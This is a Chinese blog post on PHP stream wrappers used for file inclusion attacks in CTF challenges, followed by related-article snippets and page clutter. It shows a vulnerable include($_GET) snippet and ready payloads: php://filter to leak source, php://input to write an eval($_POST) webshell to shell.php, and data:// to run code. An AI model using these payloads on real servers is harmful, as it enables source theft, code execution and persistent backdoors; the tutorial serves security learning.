php伪协议

最新推荐文章于 2024-11-02 10:26:46 发布
最新推荐文章于 2024-11-02 10:26:46 发布
阅读量151 收藏
点赞数
文章标签: php
原文链接:http://www.ppmy.cn/news/9666.html
版权

目录

常见文件包含函数

常见协议

php://

php://filter(本地磁盘文件进行读取)

php://input (读取POST数据)

file://

data:// 

常见文件包含函数

函数功能
include()代码执行到 include() 函数时将文件包含
include_once()当重复调用同一文件时只调用一次,功能与 include() 相同
require()require() 执行如果发生错误,函数会报错并终止脚本
require_once()当重复调用同一文件时只调用一次,功能与 require() 相同

 【include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file】

常见协议

伪协议功能
file://访问本地文件系统
http://访问 HTTP(s) 网址
php://访问各个输入/输出流
phar://PHP 归档
zip://压缩流
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

php://

  • 条件

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include 

  • 应用

在CTF中经常使用的是php://filterphp://inputphp://filter用于读取源码,php://input用于执行php代码。 

php://filter(本地磁盘文件进行读取)

php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

<?php
$filename = $_GET['filename'];
include($filename);
?>
?filename=php://filter/convert.base64-encode/resource=文件名.后缀(flag.php)
?filename=php://filter/read=convert.base64-encode/resource=文件名.后缀(flag.txt)

php://input (读取POST数据)

 enctype=“multipart/form-data” 的时候 php://input 是无效的

php://input + [POST DATA]执行php代码;若有写入权限,写入一句话木马

<?php phpinfo(); ?>
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>');?>

file://

条件:allow_url_fopen和allow_url_include均无要求

[文件的绝对路径和文件名] [文件的相对路径和文件名][http://网络路径和文件名]

<?php$filename  = $_GET['filename'];include($filename);
?>
file://C:\Users\admin\Desktop\PHP\flag.txt

data:// 

  • 条件

allow_url_fopen:on;allow_url_include :on;通常可以用来执行PHP代码。

data://text/plain;   data://text/plain;base64

data://text/plain,<?php phpinfo();?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

 常用php伪协议

 

正在努力中的小白♤
关注
php审计--通过php伪协议配合文件包含写入shell
qq_29437513的博客
08-13 754
有群友问过这样一个问题,, http:xxx/123.jpg 传上这样的图片马能不能连到shell? 这有几种情况,,,php解析吧jpg解析成php,iis吧jpg解析成php都可以 我们这里通过php伪协议+存在文件包含的页面做个复现 先写个include函数,include后面没做处理的 <?php $file = $_GET['a']; include "$file"; to 然后,,如果目录阶乘符不能用,url编码后无法绕过,尝试file协议 在我本地环境www目录下存在一个无类型的a
PHP伪协议
qq_37466661的博客
08-06 6359
PHP伪协议
php伪协议总结
一颗小白菜的博客
11-22 1608
PHP伪协议,也是php支持的协议和封装协议php:// 访问各个输入输出流file:// 访问本地文件系统data:// 获取数据(RFC 2397)zip:// 获取压缩流phar:// PHP归档http:// 访问网址zilb:// 压缩流ftp:// 访问ftpglob:// 查找匹配的文件路径模式ogg:// 音频流expect:// 处理交互式的流主要协议适用场景要求。
php伪协议绕过限制写shell
weixin_44304686的博客
06-12 2225
原文链接:https://mochazz.github.io/2019/01/14/php伪协议绕过限制写shell/ 这是在 code-breaking 中遇到的一道题目,名为:easy - phpmagic。题目地址:http://51.158.75.42:8082 整个代码逻辑很简单,需要关注的点就两个。一个是 第17-18行 处存在命令字符串格式化,而这里的格式化变量 domain∗∗经...
PHP伪协议利用
Echo__h的博客
04-24 371
PHP内置的URL风格的封装协议 其中,常用的主要有:php://filter php://input phar://在文件包含php文件时会自动执行,而无法读出其源码,使用php://filter可以对文件内容进行读取 读取的内容为b64编码格式,解码后即为文件源码此方法需要allow_url_include = 0n.php://打开文件流后,我们可以直接发送post写入恶意代码,即可执行主要用于在PHP中对压缩文件的读取。多用于配合文件上传漏洞使用例如将shell.txt压缩成zip格式后上传到服务器
php伪协议.zipphp伪协议.zip
02-24
PHP伪协议】是PHP中一种特殊的机制,它允许开发者通过特定的URL格式来访问和操作服务器上的资源,比如文件系统、数据库等。这个概念在PHP的早期版本中较为常见,但出于安全考虑,现代PHP环境中已经对伪协议的使用...
php伪协议.pdfphp伪协议.pdfphp伪协议.pdf
02-24
### PHP 伪协议详解 #### 一、概览 PHP 伪协议是一种特殊的 URL 格式,用于在 PHP 代码中执行特定的操作。这些伪协议主要用于处理文件读取、网络请求以及数据处理等方面。理解并恰当地使用 PHP 伪协议对于开发安全...
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3429
渗透测试-文件包含漏洞以及php伪协议的应用
php 伪协议
热门推荐
Ni9htMar3的博客
04-09 2万+
php 伪协议 php:// php://filter
[php知识点]PHP伪协议
Landasika的博客
05-17 8871
目录 一、前言1、什么是PHP伪协议2、什么时候用PHP伪协议include和require函数include和include_once的区别(require与require_once的区别)highlight_file()和show_source()readfile和file_get_contents和filefile_put_contentsfopen二、PHP伪协议file://...
php伪协议实现命令执行的七种姿势
大方子
09-06 1615
文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file 。 首先归纳下常见文件包含函数:include、require、include_once、require_once、highlight_file 、show_...
文件上传漏洞-通过.htaccess文件绕过
m0_73902453的博客
10-30 308
3.先将.htaccess上传上去,然后再打开抓包上传木马文件(1.php),然后将名字修改成1.jpg,因为刚刚的.htaccess已经上传到服务器,告诉服务器.jpg文件可以当作.php文件执行。通过这个文件,网站管理员可以进行各种配置,例如重定向、访问控制、URL重写等。结尾的文件都当作 PHP 脚本来处理,而不是作为普通文本文件或图像文件。这意味着,即使它们有文本或影像文件的扩展名,服务器将尝试执行其中的 PHP代码。2.这里以upload-labs(less-4)为例,我们先来看看靶场的源代码。
PHP文件包含漏洞
佛系摆烂
10-29 573
PHP 文件包含漏洞(File Inclusion Vulnerability)是一种常见的 Web 安全漏洞,发生在用户对 PHP 文件包含函数(如 include、require、include_once、require_once)的输入缺乏过滤和验证时。攻击者可以利用这个漏洞来包含服务器上任意文件,甚至是远程文件(如果服务器允许),从而获取敏感信息或执行任意代码。
Unsafe Fileupload-pikachu
zhangqqa的博客
10-30 990
不安全的文件上传漏洞概述文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上传一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。所以,在设计文件上传功能时,一定要对传进来的文件进行严格的安全考虑。
warmup
W286734的博客
10-30 371
查看源代码发现,source.php。访问source.php,显而易见,php代码审计。$pos。
信息学科平台系统设计与实现:Spring Boot框架
最新发布
2401_85812053的博客
11-02 282
1系统概述 1.1 研究背景 随着计算机技术的发展以及计算机网络的逐渐普及,互联网成为人们查找信息的重要场所,二十一世纪是信息的时代,所以信息的管理显得特别重要。因此,使用计算机来管理基于保密信息学科平台系统的相关信息成为必然。开发合适的基于保密信息学科平台系统,可以方便管理人员对基于保密信息学科平台系统的管理,提高信息管理工作效率及查询效率,有利于更好的为人们服务。 1.2研究目的 随着互联网技术的快速发展,网络时代的到来,网络信息也将会改变当今社会。各行各业在日常企业经营管理等方面也在慢慢的向规范化和网
php伪协议常用代码
08-05
常用的PHP伪协议代码包括: 1. 使用php://input执行PHP代码:这种方法可以通过将PHP代码作为POST数据传递,然后使用php://input伪协议来执行代码。例如,可以使用以下代码来执行phpinfo()函数并将结果输出到页面上...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值